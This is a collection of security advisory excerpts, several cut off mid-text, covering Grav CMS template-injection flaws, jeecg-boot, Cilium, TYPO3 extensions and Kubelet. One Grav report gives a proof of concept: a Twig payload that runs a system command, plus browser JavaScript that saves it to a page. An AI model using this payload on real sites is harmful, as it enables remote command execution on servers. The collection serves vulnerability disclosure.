ghsa

Hi, actually we have sent the bug report to [security@getgrav.org](mailto:security@getgrav.org) on 27th March 2023 and on 10th April 2023. # Grav Server-side Template Injection (SSTI) via Twig Default Filters ## Summary: | **Product** | Grav CMS | | ----------------------- | --------------------------------------------- | | **Vendor** | Grav | | **Severity** | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution | | **Affected Versions** | <= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) | | **Tested Versions** | v1.7.40 | | **Internal Identifier** | STAR-2023-0008 | | **CVE ...

Hi, actually we have sent the bug report to security@getgrav.org on 27th March 2023 and on 10th April 2023. # Grav Server-side Template Injection (SSTI) via Denylist Bypass Vulnerability ## Summary: | **Product** | Grav CMS | | ----------------------- | --------------------------------------------- | | **Vendor** | Grav | | **Severity** | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution | | **Affected Versions** | <= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) | | **Tested Versions** | v1.7.40 | | **Internal Identifier** | STAR-2023-0006 | | **CVE Identifier** | R...

Hi, actually we have sent the bug report to [security@getgrav.org](mailto:security@getgrav.org) on 27th March 2023 and on 10th April 2023. # Grav Server-side Template Injection (SSTI) via Insufficient Validation in filterFilter ## Summary: | **Product** | Grav CMS | | ----------------------- | --------------------------------------------- | | **Vendor** | Grav | | **Severity** | High - Users with login access to Grav Admin panel and page creation/update permissions are able to obtain remote code/command execution | | **Affected Versions** | <= [v1.7.40](https://github.com/getgrav/grav/tree/1.7.40) (Commit [685d762](https://github.com/getgrav/grav/commit/685d76231a057416651ed192a6a2e83720800e61)) (Latest version as of writing) | | **Tested Versions** | v1.7.40 | | **Internal Identifier** | STAR-2023-0007 ...

### Summary I found an RCE(Remote Code Execution) by SSTI in the admin screen. ### Details Remote Code Execution is possible by embedding malicious PHP code on the administrator screen by a user with page editing privileges. ### PoC 1. Log in to the administrator screen and access the edit screen of the default page "Typography". (`http://127.0.0.1:8000/admin/pages/typography`) 2. Open the browser's console screen and execute the following JavaScript code to confirm that an arbitrary command (`id`) is being executed. ```js (async () => { const nonce = document.querySelector("input[name=admin-nonce]").value; const id = document.querySelector("input[name=__unique_form_id__]").value; const payload = "{{['id']|map('system')|join}}"; // SSTI Payload const params = new URLSearchParams(); params.append("task", "save"); params.append("data[header][title]", "poc"); params.append("data[content]", payload); params.append("data[folder]", "poc"); params.append("data[route]", "...

jeecg-boot V3.5.0 has an unauthorized arbitrary file upload in `/jeecg-boot/jmreport/upload` interface.

jeecg-boot 3.5.0 and 3.5.1 have a SQL injection vulnerability the `id` parameter of the `/jeecg-boot/jmreport/show` interface.

### Impact When the [Gateway API](https://docs.cilium.io/en/v1.13/network/servicemesh/gateway-api/gateway-api/) is enabled in Cilium, the absence of a check on the namespace in which a [ReferenceGrant](https://gateway-api.sigs.k8s.io/api-types/referencegrant/) is created could result in Cilium gaining visibility of secrets (including certificates) and services across namespaces. An attacker on an affected cluster can configure Cilium to use cluster secrets or communicate with services that it should not have access to. Gateway API functionality is disabled by default. ### Patches This vulnerability is fixed in Cilium release 1.13.4. Cilium versions <1.13 are not affected. ### Workarounds There is no workaround to this issue. ### Acknowledgements The Cilium community has worked together with members of Isovalent to prepare these mitigations. Special thanks to @meyskens for investigating and fixing the issue. ### For more information If you have any questions or comments about ...

The ipandlanguageredirect extension before 5.1.2 for TYPO3 allows SQL Injection.

The ke_search (aka Faceted Search) extension before 4.0.3, 4.1.x through 4.6.x before 4.6.6, and 5.x before 5.0.2 for TYPO3 allows XSS via indexed data.

A security issue was discovered in Kubelet that allows pods to bypass the seccomp profile enforcement. Pods that use localhost type for seccomp profile but specify an empty profile field, are affected by this issue. In this scenario, this vulnerability allows the pod to run in unconfined (seccomp disabled) mode. This bug affects Kubelet.